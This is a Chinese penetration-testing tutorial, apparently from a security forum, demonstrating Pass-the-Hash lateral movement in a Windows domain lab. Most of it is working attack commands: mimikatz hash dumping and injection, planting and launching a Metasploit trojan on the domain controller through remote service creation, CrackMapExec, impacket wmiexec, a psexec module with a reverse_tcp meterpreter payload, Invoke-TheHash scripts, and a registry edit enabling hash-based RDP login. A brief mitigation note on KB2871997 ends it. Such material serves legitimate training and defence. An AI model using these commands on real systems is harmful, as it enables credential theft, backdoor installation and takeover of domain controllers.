[toc]
前言
Pass The Hash 即哈希传递攻击,简称 PTH,该攻击方法通过找到与账户相关的密码散列值 NTLM Hash 来进行攻击的。由于在 Windows 系统 NTLM 认证的 TYPE 3 消息计算 Response 的时候,客户端是使用用户的 NTLM Hash 进行计算的,而不是用户密码进行计算的。因此在模拟用户登录或对访问资源的用户进行身份认证的时候,是不需要用户明文密码的,只需要用户 Hash。攻击者可以利用 NTLM HASH 直接远程登录目标主机或反弹 Shell。
在域环境中,用户登录计算机时一般使用域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也相同,攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。使用该方法,攻击者不需要花费时间来对Hash进行爆破,在内网渗透里非常经典。常常适用于域环境或工作组环境。
哈希传递攻击
下面,我们以下图所示的环境来具体演示哈希传递攻击(PTH)的方法。
如图中,右侧是一个内网环境,域名为whoamianony.org,有两台主要的机器:域成员主机 Windows 7 和域控制器 Windows Server 2012,其中攻击者已经拿下了内网中的 Windows 7,接下来我们尝试通过哈希传递的方法获取 Windows Server 2012 的控制权。
使用 Mimikatz 进行哈希传递
下面演示哈希传递攻击的方法(需要管理员权限):
首先,攻击者在Windows 7上面上传mimikatz,并用mimikatz抓取Hash:
privilege::debug
sekurlsa::logonpasswords
如上图所示,成功抓取到域管理员的 NTLM Hash 为:ab89b1295e69d353dd7614c7a3a80cec
然后,在 Windows 7 上用 mimikatz 将获取的 Administrator 的 Hash 添加进 lsass 进程中:
privilege::debug
sekurlsa::pth /user:administrator /domain:whoamianony /ntlm:ab89b1295e69d353dd7614c7a3a80cec
成功,此时会自动弹出一个新的cmd窗口,这时访问远程主机或服务,就不用提供明文密码了,如下,我们列出了域控制器 DC 的c盘目录:
为了简洁,上述的操作可以用以下一句话命令代替:
mimikatz.exe privilege::debug "sekurlsa::pth /domain:whoamianony /user:administrator /ntlm:ab89b1295e69d353dd7614c7a3a80cec /run:cmd.exe"
此时,为了让域控制器 DC 上线 Metasploit,我们只需做以下工作。
生成一个msf木马shell.exe,将shell.exe上传到Windows 7主机,然后直接使用 copy 命令将shell.exe复制到域控上:
copy shell.exe \\DC.whoamianony.org\c$ // 将 shell.exe 复制到域控主机上
sc \\DC.whoamianony.org create backdoor binpath= "c:\shell.exe" // 在域控上创建服务启动木马
sc \\DC.whoamianony.org start backdoor // 在域控上立即启动该服务
sc \\DC.whoamianony.org delete backdoor // 在域控上立即删除该服务
此时虽然显示 1053 错误,但是如下图所示,域控制器成功上线,并且还是 SYSTEM 权限:
注意,哈希传递攻击要注意一下几点:
- dir命令后面要使用主机名,不能用 IP,否则报错
- 使用 mimikatz 进行哈希传递要具有本地管理员权限
使用 Crackmapexec 进行哈希传递
该工具位于kali上面,其可以对C段主机批量进行PTH攻击。
下载地址:https://github.com/byt3bl33d3r/CrackMapExec.git
在kali上直接用apt-get就可以安装:
apt-get install crackmapexec
对内网主机进行PTH的命令如下:
crackmapexec smb 192.168.93.30 -u administrator -H ab89b1295e69d353dd7614c7a3a80cec -d whoamianony.org -x whoami
crackmapexec smb 192.168.93.30 -u administrator -H ab89b1295e69d353dd7614c7a3a80cec -d whoamianony.org -x ipconfig
- IP:可以是单个IP也可以是IP段
- -u:指定用户名
- -H:指定NTLM Hash
- -d:指定域
- -x:执行系统命令
如下图所示,成功在 DC 主机上执行命令:
利用 wmiexec 进行哈希传递
这是 impacket 工具包里面的一个脚本,可以用来 PTH,同时可以走 socks4/5 代理,十分强大。
首先在攻击机上安装 Impacket 工具包:
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
pip install .
进入 examples 目录即可找到我们的 wmiexec.py,然后执行以下命令即可:
python wmiexec.py -hashes 00000000000000000000000000000000:ab89b1295e69d353dd7614c7a3a80cec whoamianony/[email protected] "whoami"
# (proxychains4) python wmiexec.py -hashes LM Hash:NT Hash 域名/用户名@IP "命令"
使用 Metasploit 进行哈希传递
经常使用的三个模块:
auxiliary/admin/smb/psexec_command // 在目标机器上执行系统命令
exploit/windows/smb/psexec // 用psexec执行系统命令
exploit/windows/smb/psexec_psh // 使用powershell作为payload这三个模块的使用方法相同,这里以exploit/windows/smb/psexec模块哈希传递攻击域控制器 DC 为例:
需要设置以下选项:
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set smbuser administrator
set smbpass 00000000000000000000000000000000:ab89b1295e69d353dd7614c7a3a80cec # 完整的Administrator用户的Hash
set smbdomain whoamianony
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.93.129
set lport 4444
exploit
注意这里的 smbpass 选项,其可以为明文密码,也可以为密码哈希,但是哈希值必须是完整的,如果不知道前面的LM Hash部分,可以像上面那样用0代替。
如下图所示,攻击成功,域控成功上线,并且是 SYSTEM 权限:
利用 PowerShell 进行哈希传递
Invoke-TheHash 项目是一个基于.Net TCPClient,通过把 NTLM 哈希传递给 NTLMv2 身份验证协议来进行身份验证的攻击套件,且执行时客户端不需要本地管理员权限。Invoke-TheHash 项目中内含如下多个脚本:
Invoke-WMIExec.ps1
Invoke-SMBExec.ps1
Invoke-SMBEnum.ps1
Invoke-SMBClient.ps1
Invoke-TheHash.ps1
其可以执行 WMI 和 SMB 命令,并对内网主机批量进行哈希传递攻击。
使用 Invoke-SMBExec 脚本
该脚本通过 SMB 在目标主机创建服务来执行命令,该脚本执行命令没有回显,我们可以用它执行一些木马程序。如下所示,我们通过 Invoke-SMBExec 脚本进行哈希传递,在域控制器上执行之前上传的 shell.exe:
Import-Module .\Invoke-SMBExec.ps1
Invoke-SMBExec -Target 192.168.93.30 -Domain whoamianony -Username administrator -Hash 00000000000000000000000000000000:ab89b1295e69d353dd7614c7a3a80cec -Command "c:\shell.exe" -verbose
成功执行 shell.exe,域控上线成功:
使用 Invoke-TheHash 脚本
Invoke-TheHash 脚本可以用来通过哈希传递在远程主机上执行 WMI 和 SMB 命令。
Import-Module .\Invoke-WMIExec.ps1 # 首先需要加载先加载Invoke-WMIExec.ps1脚本
Import-Module .\Invoke-TheHash.ps1 # 然后再加载Invoke-TheHash.ps1脚本
Invoke-TheHash -Type WMIExec -Target 192.168.93.1/24 -Domain whoamianony -Username administrator -Hash ab89b1295e69d353dd7614c7a3a80cec -Command "c:\shell.exe" -verbose
- -Target:目标主机名或IP地址/段。
- -Username:用于身份验证的用户名。
- -Domain:用于身份验证的域。本地帐户或在用户名后使用@domain时不需要此参数。
- -Hash:用于身份验证的NTLM密码哈希(格式: LM:NTLM 或 NTLM)。
- **-Command:在目标上执行的命令。如果命令未指定,则将检查用户名和哈希是否可以访问目标上的SCM。
注意使用的时候需要先加载 Invoke-WMIExec.ps1 脚本,然后再加载Invoke-TheHash.ps1脚本,因为Invoke-TheHash 里要用到 Invoke-WMIExec 方法。
成功在域控(192.168.52.138)上执行了 shell.exe,域控成功上线:
使用 Invoke-SMBClient 脚本
该脚本支持SMB1,SMB2,SMB signing,如果只有 SMB 文件共享的权限而没有远程执行权限的话,可以使用这个脚本列举远程主机上的共享目录、上传或下载文件、删除文件。
使用以下命令可以成功列举出域控制器上的共享文件:
Import-Module .\Invoke-SMBClient.ps1
Invoke-SMBClient -Domain whoamianony -Username administrator -Hash ab89b1295e69d353dd7614c7a3a80cec -Source \\DC.whoamianony.org\c$ -verbose
# Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose 查看远程主机共享目录
还有以下几种操作:
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt # 删除远程主机上指定的共享文件
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt # 在远程主机上下载指定的共享文件
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe # 向远程主机的共享目录中上传指定的文件
利用哈希传递登录 RDP 远程桌面
在内网渗透中,如果获得了某个用户的 NTLM 哈希,我们不仅可以尝试使用哈希传递的方法对WMI和SMB服务进行登录,对于远程桌面服务我们同样可以利用哈希传递进行远程登录。
借助 Restricted Admin Mode 进行哈希传递登录 RDP
适用系统:
- Windows 8.1和Windows Server 2012 R2默认支持该功能
- Windows 7和Windows Server 2008 R2默认不支持,需要安装补丁kb2871997、kb2973351
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。
在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 "Restricted Admin Mode" 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录。 Restricted Admin Mode 在 Windows 8.1 和 Windows Server 2012 R2 上默认开启。
我们在渗透过程中可以通过修改注册表的方式开启目标主机的 Restricted Admin Mode,值为 0 代表开启,值为 1 代表关闭:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" # 查看是否成功开启
如上图所示,成功在目标主机开启了 Restricted Admin Mode。
然后再攻击机上使用 Mimikatz 进行哈希传递,大致原理就是哈希传递成功后执行 mstsc.exe /restrictedadmin 来打开远程桌面:
privilege::debug
sekurlsa::pth /user:administrator /domain:whoamianony.org /ntlm:ab89b1295e69d353dd7614c7a3a80cec "/run:mstsc.exe /restrictedadmin"
报错了,说 CredSSP 加密数据库错误,大概是因为 Windows 10 家庭版的原因吧。然后更换了另一个版本的 Windows 成功了:
注意,这里的受限管理员模式顾名思义只对管理员组有效。所以如果你获取到的用户属于远程桌面用户组,那么是无法通过 Hash 登录的。
哈希传递攻击的预防
微软在2014年5月发布了 KB2871997 和 KB2928120 两个补丁。KB2871997是针对PTH攻击的,这个被称为“PTH杀手”的更新将使本地帐号不再可以用于远程接入系统,不管是 Network logon 还是 Interactive login。其后果就是:无法通过本地管理员权限对远程计算机使用 Psexec、WMI、smbexec、IPC 等,也无法访问远程主机的文件共享等。
但是在测试中发现,在打了 kb2871997 这个补丁后,常规的哈希传递已经无法成功,但是唯独默认的 Administrator(SID 500)帐号例外,利用这个账号仍可以进行哈希传递。注意即使把Administrator改名了,它的SID仍然是500,只要它还是 SID 500那么以前的攻击方法还是有效。
Ending......
文中若有不足之处,还请各位大佬多多点评。
BY:先知论坛
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论